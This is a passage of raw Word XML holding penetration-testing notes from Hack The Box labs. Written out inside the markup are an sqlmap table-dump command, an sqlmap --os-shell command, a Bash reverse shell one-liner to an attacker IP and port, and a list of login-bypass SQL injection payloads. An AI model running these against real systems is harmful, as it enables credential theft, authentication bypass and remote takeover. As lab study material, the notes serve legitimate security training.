      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -r reset.req -p email --batch --level 3 -D usage_blog -T </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin_users</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> --dump</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000188B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="583"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We see that there are 15 tables. For our intents and purposes, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin_users</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> seems the most interesting, as we might find credentials for the administrator dashboard. We dump the table's contents using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--dump </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000188C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="583"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The output is on the screen</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000188D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="583"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the Usage HTB, this lead to a hash for the admin user, and then we cracked it using JohnTheRipper</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000188E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000188F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001890">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to get shell access after SQLMap:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001891">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001892">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This was the path they used in the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Validation HTB</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, I think</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001893">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001894">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IMPORTANT:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Once it tells us that a parameter is vulnerable, we will try and get shell access on the server in order to do command injection. The goal is to get a reverse shell from server to our attacking machine. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001895">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once SQLMap tells us a parameter is vulnerable, we run SQLMap EXACTLY the same but we add the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--os-shell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001896">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -u "http://target.com/restricted_page.php/search=*" --cookie="PHPSESSID=your_cookie" --os-shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001897">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This opens up an os-shell, and then we can just input a reverse shell (ex.Bash reverse shell) so that we can stabilize the shell on our attacking machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001898">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can use this Bash reverse shell payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001899">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bash -c "bash -i &gt;&amp; /dev/tcp/{local_IP}/[port] 0&gt;&amp;1"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000189A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bash -c "bash -i &gt;&amp; /dev/tcp/10.10.16.63/4444 0&gt;&amp;1"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000189B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SET UP rlwrap netcat listener</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000189C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make sure to put in your own ATTACKING LOCAL IP AND ALSO, once you copy and paste it will run immediately so make sure to change it to your own IP before you copy and paste</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000189D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000189E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000189F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018A0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018A1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018A2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Notes about SQL Injections and Errors (WAF):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="920"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sometimes, WAF (Web Application Firewall) stops tools like SQLMap from working, since they send too many requests. That's why sometimes SQLMap doesn't work even though manually putting in SQL injections to bypass login authentication works sometimes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="920"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQLMap and SQL injections can be used for more than login authentication bypass. They can be used when in the "search" bars, since search bars often use SQL to retrieve data, so you can do something along the lines of injecting SQL code to access tables that you weren't supposed to see. That's what SQLMap also checks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018A5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018A6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018A7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL Injections:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018A8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="743"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' or 1=1 -- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="743"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Put this into the username section and put some dummy value in password</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="743"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">test' or 1=1;-- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018AB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="743"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" or 1=1#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018AC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="743"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin'#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018AD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="743"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Put this in username to log in as admin or try any other username</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018AE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="743"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin' #</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018AF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="743"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin' --</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018B0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="743"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin' -- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018B1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018B2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018B3">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL Injections to get information from tables:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018B4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018B5">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Manual SQL Injection techniques involve directly interacting with a database through vulnerable user input fields. Below are common manual SQL injection techniques to retrieve information from a database:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018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B7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018B8">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Retrieving Database Information</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018B9">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If the target is vulnerable, use SQL commands to extract database details:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018BA">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="40" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Extracting Database Version</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018BB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
